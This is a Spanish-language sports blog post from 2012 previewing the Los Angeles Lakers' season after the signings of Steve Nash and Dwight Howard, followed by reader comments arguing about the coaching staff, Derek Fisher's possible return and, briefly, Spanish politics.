L.A. Lakers: Ser campeones o no ser

15 de October de 2012 por MagicJohnson32

lakers fiveTodo al título. Sin contemplaciones ni disimulos. Los Lakers, tras unos meses en los que parecía que la pujanza de Thunder y Heat les había pillado a pie cambiado y nos hicieron dudar del rumbo de la franquicia, han descubierto al fin sus cartas, y no van de farol. La jugada de los Buss es clara: exprimir el ciclo con Kobe Bryant al frente, al mismo tiempo que se ponen los andamios del proyecto futuro. Para ello será necesario un extraordinario esfuerzo económico, posible gracias a la implicación incondicional de Jerry Buss y al ingente acuerdo con Time Warner, que se ha hecho con los derechos televisivos de los Lakers para los próximos veinte años. También ha resultado imprescindible la varita mágica del prestidigitador Mitch Kupchack, que metió en su chistera un puñado de rondas y Andrew Bynum y sacó a Steve Nash y Dwight Howard. Las circunstancias, de una manera u otra, se han aliado a su favor (el veto de Stern, la situación familiar de Nash, el comportamiento de Howard, la calamitosa gestión de los Magic…) pero no debemos negarle el más mínimo mérito a Kupchack, quien una vez más ha sido capaz de rearmar la plantilla maximizando todos y cada uno de los recursos de que disponía.

Los angelinos se han movido este verano con un tino quirúrgico. Lo primero que hizo Kupchack fue acabar con las tribulaciones casi históricas de los Lakers en la posición de base. El 4 de julio, entre fuegos de artificio y proclamas patrióticas, los Suns acordaron el sign & trade de su jugador emblema a cambio de cuatro elecciones del draft (dos primeras, dos segundas) y la trade exception que los californianos obtuvieron en el traspaso de Lamar Odom a los Mavs. Nash, tantas veces verdugo o víctima de los Lakers, será ahora timonel de un equipo dramáticamente necesitado de dirección, creatividad y lanzamiento exterior. A sus 38 años, el canadiense conserva una clarividencia extraordinaria y se presenta como el director de orquesta idóneo para interpretar la partitura de este equipo. La defensa, principal tara de Nash, debería de serlo menos dado el fenomental entramado de guardaespaldas que le acompañarán en el quinteto, con Kobe Bryant y Metta World Peace, dos de los mejores defensores exteriores de la liga, y, ante todo, con Dwight Howard.

dwight howard media

Si Nash ha de ser quien ilumine el a menudo penumbroso juego ofensivo de los Lakers, Howard ha de ejercer de ancla defensiva. El tres veces Defensive Player of the Year llega a Los Angeles en último año de contrato, tras el sainete que protagonizó la temporada pasada en Orlando, y todavía renqueante después de pasar por el quirófano para solventar sus problemas de espalda. Sobre esa espalda maltrecha recaerá buena parte del peso, de las exigentes miradas de la prensa y los aficionados de L.A., que ven en Howard al heredero de los grandes pívots que han vestido de púrpura y oro, así como la piedra angular del proyecto post Kobe. Jim Buss ha sacrificado a su protegido, Andrew Bynum, aun a sabiendas de que Howard será agente libre sin restricciones en el verano de 2013 y que queda únicamente en manos del jugador su continuidad en los Lakers más allá de esa fecha. La franquicia confía en que el pívot quedará deslumbrado por los focos de Hollywood y renovará, y no en vano nadie podrá ofrecerle tantos años y dinero como los Lakers: cinco temporadas con un incremento anual del salario del 7,5%, por los cuatro años y el 4,5% que le podrían dar el resto de equipos.

Nash y Howard formarán de inicio junto a Kobe Bryant, Metta World Peace y Pau Gasol, únicos supervivientes en la plantilla del equipo campeón en 2010. Bryant afronta su 17ª campaña en la NBA dando escasos síntomas de agotamiento, aferrado a su condición de mejor escolta y uno de los mejores jugadores de la liga (sexto mejor, si hacemos caso al ranking de ESPN), con un nuevo oro olímpico para la vitrina del salón y aparentemente preparado ante una de sus últimas oportunidades de hacerse con el ansiado sexto anillo. Ya ha insinuado que podría retirarse en dos años, cuando finalice su actual contrato, pero no hay que esperar durante este ocaso de su carrera una gran caída en su producción ofensiva. En todo caso, primará la calidad sobre la cantidad siempre que Mike Brown sepa administrar mejor los minutos en pista de Kobe, quien además se beneficiará al fin de la compañía de un base capaz de generar buenas opciones de lanzamiento.

kobe & pauPero si ha habido un beneficiario inmediato de la llegada de Steve Nash, ese es Pau Gasol, cuyo estatus en la plantilla ha dado un vuelco a raíz de la incorporación del canadiense. De jugador literalmente traspasado hace menos de un año y principal candidato a pagar los platos rotos de la eliminación ante los Thunder, a pieza esencial e imprescindible en la renovada propuesta de los Lakers, entusiasmados ante la perspectiva de reunir a dos jugadores de tan marcado talante colectivista. Las novedades en la plantilla, con Dwight Howard y más anotadores a su alrededor, permitirán a Gasol abrazar el papel de pasador, en el que se siente especialmente cómodo.

A World Peace le corresponde un rol más concreto si cabe, más aún que en pasadas campañas: el de malo de la película. El disfuncional alero afronta una temporada crucial, en la que ha de hacer méritos para no ser amnistiado el verano próximo (cosa que podría suceder igualmente, dada la situación salarial de la franquicia y los casi 8 millones de dólares que ganará el jugador si ejecuta su player option). Los primeros informes que llegan desde L.A. apuntan a un MWP en un excelente estado de forma, y así lo aparenta en las imágenes del Media Day. La atención recaerá en sus compañeros de quinteto, pero el rendimiento de World Peace será fundamental en las posibilidades de anillo, como ya ocurriera en 2010. Durant y LeBron esperan, con toda probabilidad, en el camino.

jamison mediaNo solo ha dedicado Kupchack esta off season a mejorar el cinco inicial; también ha reforzado sustancialmente el banquillo, que tan poca producción ofreció la temporada pasada. Comandará la segunda unidad Antawn Jamison, quien ha sabido reconocer la oportunidad que se le presentaba y ha firmado un contrato de un año por el mínimo. El mejor sexto hombre de la temporada 2003-2004, quien ya estuviera bajo las órdenes de Mike Brown en Cleveland, tendrá la responsabilidad de anotar y ofrecer una rotación de calidad en las posiciones de 3 y 4. Sus problemas para defender tanto a aleros más rápidos como a ala-pívots más fuertes llevan a suponer que compartirá minutos en pista con Dwight Howard. Desde Philadelphia llega -también como agente libre pero en su caso para ser suplente de Kobe Bryant- Jodie Meeks, a quien los Sixers dejaron marchar tras su decepcionante 2012. A poco que esté acertado, Meeks será el tirador que se nutra de las asistencias de Nash y de los espacios que generarán Bryant, Gasol y Howard. En su mejor campaña en Philly, la 10-11, Meeks fue capaz de promediar 10,5 puntos con un 40% desde más allá de la línea de tres, números que debería estar en disposición de emular.

Las novedades en la plantilla de los Lakers se completan con Chris Duhon y Earl Clark, incluidos por los Magic en el traspaso de Dwight Howard, además de la reciente incorporación de Chris Douglas-Roberts, quien intenta regresar a la NBA tras su paso por la Virtus Bologna. A los rookies Johnson-Odom, Aguilar, Sacre y Nelson difícilmente los veremos en pista más que en los minutos de la basura, si es que alguno se hace con una plaza en la plantilla definitiva. Desde el banquillo repetirá Jordan Hill, a quien su energía y su notable papel en la eliminatoria ante los Nuggets le han valido la renovación por dos temporadas, a 3,5 millones por cada una de ellas. Hill servirá de recambio en las dos posiciones interiores, junto a Clark y los minutos que Jamison juegue como 4. También ha renovado Devin Ebanks, que firmó la qualifying offer de un año de los Lakers y añadirá profundidad en la posición de alero. Por fuera, Steve Blake (todavía recuperándose tras agujerearse el pie mientras caminaba descalzo por un aparcamiento en la playa) y Meeks parten sobre el papel como primeras rotaciones para Nash y Bryant, con Chris Duhon, Andrew Goudelock y Darius Morris como principal competencia, sin perder de vista a CDR. No sería de extrañar que Brown acabase dando prioridad a Duhon, de clarísimo perfil defensivo, sobre Blake conforme avance la temporada.

Tan acertado ha sido el verano por parte de la gerencia de los Lakers, que incluso le han buscado refuerzos a Mike Brown en la forma de un renovado equipo de asistentes. Messina ha regresado a Moscú y se ha llevado con él a Quin Snyder, mientras que a nuestro admirado John Kuester le han asignado un cargo de scouting. Con el objetivo de hacer pasar por un buen entrenador a Brown, incapaz todo el año de aportar soluciones a lo que sucedía sobre el parquet, los Lakers han contratado a Eddie Jordan y Bernie Bickerstaff. Con el primero, pretenden incorporar los principios del Princeton offense, la propuesta modelada por Pete Carril que se fundamenta en la circulación rápida, los cortes agresivos y la generación y aprovechamiento de espacios. No veremos a estos Lakers transformados en los Kings de Adelman (en los que Carril fue técnico asistente), pero sí debemos esperar un dinamismo del que venían careciendo y un menor abuso del aclarado a Kobe.

nash kupchackBajo tanta luz resulta inevitable alguna sombra: la edad media de Nash, Kobe, Pau, Jamison y World Peace es de casi 35 años, y está por ver cómo regresará Dwight Howard tras la operación a la que se sometió a finales de la temporada y si el físico de Nash se sostendrá sin los milagrosos cuidados de los servicios médicos de los Suns. El banquillo, pese a mejorar respecto al año pasado, presenta deficiencias y alternativas muy limitadas en caso de lesión de Nash, Bryant o Howard.

Pero cualquier duda que seamos capaces de intuir, cualquier contratiempo que queramos anticipar, cualquier problema que podamos presagiar, todo queda desintegrado bajo el peso de los hechos objetivos: los Lakers han añadido a un base dos veces MVP y al mejor pívot de la liga a un equipo en el que ya figuraban el mejor anotador del siglo XXI y el mejor jugador que ha dado el baloncesto español en toda su historia. Y así, con un poker de ases, con la mejor mano de cuantos jugadores hay en la mesa, los Lakers hacen una apuesta definitivamente ganadora. All in. Ser campeones o no ser.

Altas: Steve Nash, Dwight Howard, Antawn Jamison, Jodie Meeks, Chris Duhon, Earl Clark, Chris Douglas-Roberts, Ronnie Aguilar, Darius Johnson-Odom, Reeves Nelson, Robert Sacre, Greg Somogyi.

Bajas: Andrew Bynum, Matt Barnes, Josh McRoberts, Christian Eyenga, Troy Murphy, Ramon Sessions.

Quinteto: Steve Nash, Kobe Bryant, Metta World Peace, Pau Gasol y Dwight Howard.

Sexto hombre: Antawn Jamison.

Pronóstico: alrededor de 65 victorias en regular season y campeones de la NBA 2013.

Comenta

41 comentarios a esta entrada

  1. nba dice:
    #1

    Buen pronostico Magic, ya veremos si al final se cumple, yo creo que acabaran la regular segundos , los thunder estan a otro nivel, sobre todo en intensidad defensiva.
    Viendo que todavia no ha empezado la temporada, y ya se ha lesionado Hill, yo firmaria a Sacre y Somgyl fijos, le daria mas protagonismo en lo que queda pretemporada a Odom y sino puerta.
    No me esta gustando nada que se caiga en los mismo errores que temporadas pasada, este año se ha arreglado un poco el banquillo con Jamison-Meeks, pero sigo creyendo que si Brown no se encarga de compensar mas los quintetos se van a llevar una sorpresa desagradable a final de año.
    La actitud de los rookies debe mejorar, pero para ello Brown tiene que darles 30 minutos en pretemporada para ver si realmente valen para los Lakers, ya que Sacre parece que se ha hecho ya con el 5 titular hasta que vuelva Howard.

      Citar

  2. Sancho88 dice:
    #2

    Obviamente, el pronósitco es acertado, deben ser campeones. No creo que con ese ratio de victorias en la regular, yo diría que echarán siestas abundantes, como han hecho los últimos años. 55-60 y campeones, diría yo. Y luego, pienso que el banquillo es una real mierda, excepto Jamison y Meeks para anotar. No has comentado nada sobre Derek Fisher. No se rumoreó este verano que iba a firmar de nuevo?

    Y luego, todo ese royo de la tactica ofensiva y demás… una pamplina como una casa. Jordan es un giñapo como asistente, coach, ayudante de asistente, segundo entrenador, general manager… de lo que le pongan. Un pringao en toda regla. Brown es como Zapatero, pone a su lado mediocres como Messina, Kuester, Jordan… tipos vomitables.

    EN L.A. ESTE AÑO SE HARÁ LO QUE PACTEN STEVE Y KOBE, Y EL RESTO A CALLAR.

    No me extrañaría que ni siquiera Miguelito dé las charlas en los descansos. Que se dedique a llenar de mierda su vasito y no se meta en lo que deben hacer estos tíos. Si juegan a lo que dicen Steve y Kobe, irán bien. Si no, la cagarán. Pau no llega a Febrero

      Citar

  3. nba dice:
    #3

    Lo de fisher sancho, supongo que primero se tendran que quitar a Blake y Duhon, comparto tu opinion de que si Pau no mejora sus prestaciones defensivas lo largan antes de febrero, ya que al lado de Howard cantara mucho mas su actitud.

      Citar

  4. Viva_Dirk dice:
    #4

    Eddie Jordan siempre ha sido un entrenador jefe mas que decente, con un estilo muy definido y aprovechando bastante bien lo que tiene, sin tener movidas con jugadores ni exigir perfiles de jugadores como les pasa a otros. De buena gana lo cambiaba por Brown.

    Del análisis nada que decir, Magic siempre se ha explicado mejor que yo 😉

      Citar

  5. MagicJohnson32 dice:
    #5

    Fisher no puede firmar por los Lakers hasta que transcurra un año desde la fecha de su traspaso. Por eso no lo menciono. Sí, es posible que regrese (ya sabemos que ha estado entrenándose en las instalaciones del equipo), pero no podría hacerlo hasta el 15 de marzo, y quién sabe cómo estarán las cosas entonces para el equipo y para el jugador.

      Citar

  6. Chipi dice:
    #6

    Pensaba que nadie odiaba más a Brown que yo, pero Sancho me ha dado hasta miedo xD.

    Grandísimo análisis, me ha encantado lo de “disfuncional alero”. La verdad es que el banquillo no es gran cosa, pero al menos con Jamison, Meeks, Duhon o Douglas-Roberts parece que tengamos jugadores de baloncesto y no caros agitatoallas como antaño.

    Yo les doy 60 victorias y campeones si pueden con los Thunder. Si no, campeón Miami.

      Citar

  7. Viva_Dirk dice:
    #7

    Sancho ha dicho que el banco fuera de Meeks&Jamison es basura y Chipi que no es gran cosa. Evidentemente no es el mejor banquillo de la liga, pero fuera de Jamison y Meeks, Duhon siempre ha sido un buen base defensivo y Jordan Hill puede dar 15 minutos de mucha intensidad y ‘aprovechamiento de Nash’ jeje. Con esos 4 y Blake creo que tenemos mucho mejor banquillo que el año pasado, y también mejor que en el repeat.

      Citar

  8. HisRoyalAirness dice:
    #8

    Suscribo palabra por palabra el análisis.
    Y respecto al comentario de Sancho, igual.
    He vuelto a ver, en los partidos de pretemporada, la misma inutilidad de Brown colocando ofensivamente a Pau. Se come posesiones malísimas y casi no recibe en el poste bajo, teniendo en cuenta que es uno de los 3 mejores de la liga en esos lares.
    Es un equipazo y lo normal es que ganen el título pero tienen al mando de la nave a un inútil con todas las letras (qué pena de Phil con este equipazo, madre mía…)

      Citar

  9. Sancho88 dice:
    #9

    Repito, y hablo de recuerdo. Jordan es igual de inutil que Brown. En Philadelphia lo saben, en Washington lo saben, y en su casa lo saben pero no se lo dicen porque les da pena.

    Colegas míos, muy de los Sixers, acérrimos, no tenían ni puta idea de su sistema de rotación, cambios ridículos… igual te quitaba a Brand de titular haciendo numerazos o cortaba descaradamente las buenas rachas de Thaddeus, Iguodala, Speights haciendo lo mismo. Igual un partido lo bordabas y al otro no jugabas. En serio, un cáncer de tipo. De hecho, se piró de Philadelphia y el equipo empezó a coger color a partir de ahí. Reconocedlo, todo el equito técnico son mediocres, carentes de liderazgo e incompetentes para saber cómo dirigir a Bryant y compañía. El año pasado ya debieron hacer un motín contra el Marrón y no lo hicieron. Espero que este año ejerza Nash de entrenador tanto dentro como fuera de la pista

      Citar

  10. nba dice:
    #10

    Yo es que a este equipo me gustaria verlo con un Byron Scott a los mandos, entonces si que los aficionados Lakers fliparian

      Citar

  11. Esteban dice:
    #11

    comparto casi todo magic, a excepcion del recambio de howard

    hill es un interno de sumo lujo para salir del banco, incluso merece ser titular, el año pasado por 36 minutos, promedio 14.5 ppp y 13.6 rbt, una animalada

    por lo que entiendo que la falta de howard no puede estar mejor cubierta

    tienen al mejor juego interior de la NBA desde DUNCAN, ROBINSON, y con mucho mas recambio,

    creo que alli reposan sus chances de ser campeon, pueden hacerle un daño irreparable al HEAT en el juego interior, quienes sencillamente no tienen con que contrastar, salvo que LEBRON defienda a howard, si bosh defienda a DW12 este puede irse sin demasiados problemas a los 40 puntos y 20 rebotes

    para vencer al thunder necesitaran mucho mas, creo que sus mayores rivales son ellos y no el heat

      Citar

  12. portu dice:
    #12

    Veo a Miami y Oklahoma a otro nivel. No es lo mismo estar en plenitud de facultades físicas q estar en 35, 38 y 32 años, tampoco va a estar al 100% Howard hasta bien entrada la temporada. Lo máximo a lo q pueden aspirar es a hacer lo q hizo Boston contra Miami en los playoffs pasados, pero si consiguiesen hacer eso y dar el pasito más adelante y eliminarlos creo q luego sería ya muy difícil q repitiesen contra Miami en una hipotética final. Les doy menos victorias y final de conferencia.

      Citar

  13. GreenPride dice:
    #13

    Y llegamos a uno de los platos fuertes… los Lakers han hecho un equipo para ir a por el anillo y van a soportar la presión que llevaban los Heat estas dos temporadas pasadas. Todos los focos apuntándoles y mucha gente esperando para incarles el diente en caso de fracaso aunque no son tan odiados como esos Heat de hace dos años tras “La Decisión”. Lo que está claro es que por nombres no hay quinteto titular que a priori tenga tanta calidad y experiencia como el de LA. Si repasamos creo que hay 5 o 6 all-star en la plantilla, 2 MVPs, vamos todo un compendio de estrellas y sin embargo son varias las dudas que se ciernen antes de empezar en este equipo. Vamos a ir por importancia:
    1) ¿Es Mike Brown lo suficientemente inútil para no saber sacar partido de este equipo? Ha demostrado con creces ser un entrenador sin muchas luces y como las cosas no vayan bien desde el principio va a estar en el banco de salida desde el minuto uno. Sinceramente si los jugadores pasan de él y Nash hace de entrenador en pista creo que la cosa no funcionará, mejor que les de libertad y así puedan jugar a su aire sin tener que darle de lado. Llegados los PO será cuando más podrán echar en falta un entrenador en condiciones…
    2) ¿Conseguiran todos sus titulares mantenerse en forma y sin lesiones? Nash, Kobe, Pau y Jamison no son ya precisamente jovencitos y si quieren aspirar al anillo deberán estar todos enchufados porque el banquillo aunque mejorado no da para sustituir a ninguno de los 4.
    3) ¿Podrá Bryant acostumbrarse a ser matador en vez de amasador de bola? Lleva tanto tiempo pidiendo el balon desde el principio para jugársela que habrá que ver que tal mezcla con un Nash que también está totalmente acostumbrado a tener la bola en sus manos más de medio ataque. De la conjunción y entendimiento de ambos debe salir la mayoría de los puntos del equipo (directa o indirectamente)
    4) Y esta muy ligada con la 1) ¿Como van a aprovechar los Lakers a Pau Gasol en ataque? El año pasado con un Bynum que se movía por dentro Pau jugaba siempre por fuera con pésimos resultados para el ataque Laker. Este año todos sabemos que Howard es peor atacante que Bynum y con un rango de tiro menor (tiene que estar a menos de 2 metros del aro para meterlas) por tanto, ¿Otra vez Pau a tirar de 3? Si es así habrán desaprovechado una de las claves de los 2 anillos de Pau en LA que fue las ventajas que creaba con su gran juego cerca del aro y su clarividencia de pase. Si lo desaprovechan el ataque de los Lakers se volverá mucho más espeso pero ¿Que haces con Howard si le das la bola a Pau por dentro? En mi opinión deberáin ponerle de bloqueador de Bryant y Nash durante muchas jugadas e intentar usarle en las continuaciones más que como primera opción de ataque y dar más bolas interiores a Pau
    5) La defensa. En teoría hay 3 defensores excelsos en su quinteto incial (Bryant, Metta y Howard) pero habrá que ver como suplen las carencias de Nash y Pau en este apartado. Aquí es donde Howard sí les puede dar un plus muy importante cortando las penetraciones que les van a venir sobre todo de los bases rivales.
    En definitiva un equipo con unas posibilidades increibles, con jugadores de muchísimo talento ante sus últimas oportunidades para el anillo y que estarán en la obligación de ganar sí o sí ya este año. Si de verdad se conjuntan y aceptan sus respectivos roles pueden llegar a ser imparables pero habrá que esperar a ver si lo consiguen.
    Yo no les doy tantas victorias en la regular porque creo que tardarán en acoplarse. Les veo segundos en la regular en el Oeste cercanos a las 60 victorias y jugando unas finales de conferencia épicas contra los Thunder donde a día de hoy creo favoritos a los de OKC. Sin embargo si todos los angelinos juegan en su mejor nivel creo que pueden ser mejor equipo que Oklahoma y llegar a las finales. Y ahí ya veríamos qué pasa y si podrían coronarse presumiblemente contra los Heat o sorpresa sorpresa contra otro (Boston??)

      Citar

  14. Denise dice:
    #14

    Equipazo en cada una de las líneas, todo lo que no sea al menos una final de conferencia, sería un fracaso ridículo y estrepitoso. Me dejan grandes dudas las cuestiones 3 y 4 que habla Greenpride en su comentario. No descartaría un trade con Pau y/o MWP durante la temporada.

    Sobre Mr.Potato Brown, pésimo entrenador, veremos como sale de ésta. Por cierto, un tipo que me parecía un gran coach y no sé que ha sido de él es Mo Cheeks.

    Prónostico: 67-15 . Finalista de la NBA vs los Heat.

      Citar

  15. HisRoyalAirness dice:
    #15

    Esteban, lo de Lebron defendiendo a Howard ya sí que me parecería ciencia ficción. Es más siempre me ha aburrido “The choosen one” pero si le veo hacer eso me compro su camiseta.

    Creo que se está hablando mucho de Howard y Kobe y la pieza fundamental va a ser Nash. Él decidirá quien tira, decidirá si se juega pick&roll o aclarados y en caso de que otro tenga el balón se abrirá para abrir campo, ya que es un tirador al que no se puede dejar solo.
    A mí no me gustaría verles con Byron Scott, me gustaría un ataque total con libertad tipo Adelman o un run&gun tipo D´Antoni o Riley

      Citar

  16. Denise dice:
    #16

    Con D’Antoni un run gun seria el caos…Pau y DH corriendo de lado a lado la pista durante 40 minutos, por no hablar de que su rotación se basaría en 8 jugadores, de los cuales 5 tienen mas de 32 años.

      Citar

  17. nba dice:
    #17

    A mi el que me ha sorprendido positivamente es MWP, nada que ver a como aparecio el año pasado en el training-camp, este año esta completamente fibroso esperemos que no se descentre durante la temporada.

      Citar

  18. Esteban dice:
    #18

    HisRoyalAirness, lo de lebron fue una forma de decir, por que creo que no hay nadie en el heat capaz de hacerle las cosas complicadas a howard, lo unico que les quedaria es ponerlo a lebron alli, ya vimos como hizo trizas a rose hace un año en los finales de los juegos

    como dije, el rival de los lakers son el thunder, con su juego interior rocoso capaz de parar a las torres gemelas de los lakers y un perimetro tan joven y energico que puede traerle problemas a sus veteranos

    si pueden con el thunder, creo que tienen a howard para cargarse al heat

      Citar

  19. Viva_Dirk dice:
    #19

    Sancho88:
    Repito, y hablo de recuerdo. Jordan es igual de inutil que Brown. En Philadelphia lo saben, en Washington lo saben, y en su casa lo saben pero no se lo dicen porque les da pena.

    Colegas míos, muy de los Sixers, acérrimos, no tenían ni puta idea de su sistema de rotación, cambios ridículos… igual te quitaba a Brand de titular haciendo numerazos o cortaba descaradamente las buenas rachas de Thaddeus, Iguodala, Speights haciendo lo mismo. Igual un partido lo bordabas y al otro no jugabas. En serio, un cáncer de tipo. De hecho, se piró de Philadelphia y el equipo empezó a coger color a partir de ahí. Reconocedlo, todo el equito técnico son mediocres, carentes de liderazgo e incompetentes para saber cómo dirigir a Bryant y compañía. El año pasado ya debieron hacer un motín contra el Marrón y no lo hicieron. Espero que este año ejerza Nash de entrenador tanto dentro como fuera de la pista

    Todo lo que dices de Eddie Jordan no es cierto. Tuvo 4 años a los Wizars en play-offs, y eso que cada año le quitaban alguna pieza del equipo, sacando rendimiento de tipos como Stevenson, Jarvis Hayes, Antonio Daniels, Haywood, Jared Jeffries o Roger Mason Jr. En un equipo con nulo juego interior lo hizo realmente bien.

    Entrenó un año en los Sixers, el año que ‘volvió’ Iverson, sin base, con un montón de jugadores cortados por el mismo patrón y con unas ganas locas de reconstruir.

    Vamos que no es ningun grande, pero es un entrenador de lo decentito que hay en la liga.

      Citar

  20. Sancho88 dice:
    #20

    Por cierto, y aviso. OFFTOPIC en toda regla. Si queréis me lo borrais, pero me he enterado de esto y creo que es de justicia comentaroslo por si no lo habiais visto.

    http://www.quenotehipotequenlavida.org/?page_id=4

    Aquí se pueden ver los puntos disponibles por toda España para firmar la ILP de la dación en pago. Faltan 90.000 firmas y el plazo acaba en 15 días, el 2 de noviembre. Repito, siento manchar el análisis, pero me ha parecido tan importante, y tan increíble que no se le haya dado coba en todos los putos medios de incomunicación de este país, que me parece molt fort. Me parece que no podemos hacer la vista gorda con estas cosas. Luego llegarán los peperos y dirán que no, pero si esta ILP va a trámite, al menos, se les caerá la puta cara de verguenza. Joder, que no se diga que no nos ponemos de acuerdo en nada, que estamos todos indignados y luego no hacemos nada. Que esto es una firmita de mierda y creo que son lugares estratégicos de nuestras ciudades a los que me parece que todos en mayor o menor medida podemos acceder.

    Y repito, siento el offtopic, pero se qeu esto lo lee mucha gente, y creo que nadie somos totalmente ajenos al problema de las hipotecas. Saludos

      Citar

  21. HisRoyalAirness dice:
    #21

    Sancho, soy de la misma opinión que tú y te agradezco el enlace pero creo que habría que evitar pensar que aquí, por mucho que tengamos en común, todos cojeamos del mismo pie. Lo digo por el comentario de los “peperos”, que puede generar malos rollos.

      Citar

  22. Sancho88 dice:
    #22

    ok. Yo voté al pp hace tres o cuatro años, además varias veces. En mi familia la mayoría son de derechas y demás, pero esto es intolerable. Pero bueno, hasta aquí. No quiero manchar de política el análisis de los Lakers, jejeje. Yo dejo ahí el enlace y a ver si granito a granito hacemos algo democráticamente y de una vez en este país

      Citar

  23. MagicJohnson32 dice:
    #23

    No, a ver, si es para rajar del PP, os dejo. Si no, fuera 😉

    Tema Fisher… resulta que sí puede firmar por los Lakers. Explica Marc Stein que fue cortado por los Rockets antes de que pudiese ejercer su player option para la 12-13, con lo que es agente libre sin restricciones y, por tanto, puede firmar con cualquier equipo.

    Parece claro que los Lakers intentarán colocar el contrato de Blake o Duhon (cerca de 8 millones en dos años cada uno de ellos), y si lo consiguen Fisher tendría todos los números para volver.

      Citar

  24. Vader dice:
    #24

    Si se sacan a Duhon tendran un muy buen trio de bases: Nash, Fisher y Blake…

      Citar

  25. TheDeerHunter dice:
    #25

    Si vuelve Fish ya no me queda ninguna duda.
    65 victorias y campeones.

      Citar

  26. Denise dice:
    #26

    Fisher?? Oh si, gran movimiento para rejuvenecer el equipo. Lo de fichar a Fisher será algo sentimental o para ejercer de lider espiritual, deportivamente ya no vale un carajo.

    Sancho, no te indignes, esta nacion es un pais subdesarrollado economica, cultural y espiritualmente. La culpa no es ya de los políticos, es de los ciudadanos que, generalizando, son pasivos, conformistas, sin cultura y sin responsabilidad.

      Citar

  27. 1899 dice:
    #27

    Denise: Fisher?? Oh si, gran movimiento para rejuvenecer el equipo. Lo de fichar a Fisher será algo sentimental o para ejercer de lider espiritual, deportivamente ya no vale un carajo.Sancho, no te indignes, esta nacion es un pais subdesarrollado economica, cultural y espiritualmente. La culpa no es ya de los políticos, es de los ciudadanos que, generalizando, son pasivos, conformistas, sin cultura y sin responsabilidad.

    Pues aqui TODOS somos ciudadanos no??

      Citar

  28. Denise dice:
    #28

    @1989: Podria dar mas argumentos, pero este no es el lugar mas adecuado. Solo añadir que no puedes compararme la mentalidad civilizada de un nórdico, un alemán y demás paises del norte central europeo, con la mentalidad dejada y despreocupada de los mediterráneos como los españoles. Qué “casualidad” que todos los paises en crisis ahora sean sureños, Portugal, España, Grecia, Italia sin poner ya al conjunto de paises de la extinta Yugoslavia.

    Y personalmente, cada uno que sirva a la nación que quiera, yo espiritualmente ni tengo patrias, ni reyes, ni dioses. (si acaso el Dios de las Tetas y el Vino, como diría Tyrion Lannister..xD)

    Lo siento por el off-topic, lo dejo ya.

      Citar

  29. TheDeerHunter dice:
    #29

    Denise:
    Fisher?? Oh si, gran movimiento para rejuvenecer el equipo. Lo de fichar a Fisher será algo sentimental o para ejercer de lider espiritual, deportivamente ya no vale un carajo.

    Sancho, no te indignes, esta nacion es un pais subdesarrollado economica, cultural y espiritualmente. La culpa no es ya de los políticos, es de los ciudadanos que, generalizando,son pasivos, conformistas, sin cultura y sin responsabilidad.

    Fisher rules!!

    PD: Apuntado en mi lista de “Zas en toda la boca” al final de temporada

      Citar

  30. Denise dice:
    #30

    TheDeerHunter: Fisher rules!!PD: Apuntado en mi lista de “Zas en toda la boca” al final de temporada

    ¿Pero está confirmado que va a Lakers?
    jaja, será un placer recibirlo…. Ojo, que no me extraña que gane otro anillo, pero en plan Josh Powell, Sun Yue y cosas asi…

      Citar

  31. MagicJohnson32 dice:
    #31

    No, qué va, no hay nada más allá de especulaciones.

    Pero, igualmente ¡Fisher Rules!

      Citar

  32. 1899 dice:
    #32

    Denise: @1989: Podria dar mas argumentos, pero este no es el lugar mas adecuado. Solo añadir que no puedes compararme la mentalidad civilizada de un nórdico, un alemán y demás paises del norte central europeo, con la mentalidad dejada y despreocupada de los mediterráneos como los españoles. Qué “casualidad” que todos los paises en crisis ahora sean sureños, Portugal, España, Grecia, Italia sin poner ya al conjunto de paises de la extinta Yugoslavia.Y personalmente, cada uno que sirva a la nación que quiera, yo espiritualmente ni tengo patrias, ni reyes, ni dioses. (si acaso el Dios de las Tetas y el Vino, como diría Tyrion Lannister..xD)Lo siento por el off-topic, lo dejo ya.

    Pues si es una cuestion de mentalidad para que nos vamos a preocupar, no damos para mas y punto.

      Citar

  33. nba dice:
    #33

    Por fin Brown haciendo algo que se le reclamaba en pretemporada, sentando a los pesos pesados salvo Kobe, y probar a casi todos los rookies, aunque se pierda de paliza.
    Lo que me extraña que apenas cuenten con Odom y Somogyl en estos partidillos de pretemporada, para ver cual es el potencial real de ellos,.
    Por cierto menudo partidito se ha marcado Jamison, parece que tenia el punto de mira desviado, en cambio Kobe a lo suyo

      Citar

  34. Denise dice:
    #34

    Bueno..como veis los fans de Lakers este 0-5 ¿empieza a ser preocupante? porque salvo Howard, todos los demas lideres estan jugando ya una importante miutada y el mejor está siendo ….Metta WP

      Citar

  35. nba dice:
    #35

    El partido que realmente me importa es el contra Clippers, por el contrario perder estos partidos y tener a cuatro rookies en el banquillo sin jugar, es algo dificilmente explicable, aunque tiene su explicacion si nadie baja el culo para defender, y los interiores estan un poco blanditos, pues pasa lo que pasa..
    Tengo la creencia de que si se pierde contra Clippers largaran a Brown, ya que el darle una plantilla como esta a este tio es como dejarle un ferrari a un crio de 3 años

      Citar

  36. MagicJohnson32 dice:
    #36

    Los resultados de la pretemporada no tienen la más mínima importancia. Cero. Me preocupan más detalles como el rendimiento de Meeks.

    Ya tendemos a ver mal cualquier cosa que haga Brown, y tampoco es eso.

      Citar

  37. simon dice:
    #37

    De todas formas yo vi el partido de ayer y es que no tiene nada que ver con lo que vamos a ver en la liga… la defensa es inexistente, se corre al tun tun… se toman tiros raros… se riza el rizo en las jugadas… intensidad nula no, nulísima… y en el ultimo cuarto los titulares vieron muy muy pocos minutos con el partido igualado… no da ni para sacar conclusiones… a lo mejor alguien q se levanta para ver los box scores saca conclusiones pero es que he visto dos partidos de lakers en esta pre-season y es que no dan ni para sacar conclusiones ni de como va a ir la rotación ni nada, solo para tomar contacto y casi ni eso… hasta que no empiece la temporada no vamos a ver nada en lo que podamos guiarnos…

      Citar

  38. nba dice:
    #38

    Cierto Simon-Magic, en que de un partido de pretemporada se pueden sacar 0 conclusiones, pero lo que yo veo es, estamos 100% seguros de lo que pueden aportar Nash-Kobe-MWP-Pau-Ebanks-Jamison-Hill e incluso Howard, pues hagamos cosas logicas como que estos no se peguen 30 minutos por partido y vamos a ver si el resto de componentes del “camarote de los Hermanos Marx”, pueden aportar cosas interesantes para los problemas que se pueden presentar a lo largo de la temporada, que lo que mas fastidia es tener un banquillo lleno de rookies que juegan 0 o 5 minutos, demosle continuidad en estos partidos de pretemporada para que se sientan comodos y si realmente se ve que no van a aportar soluciones pues puerta.
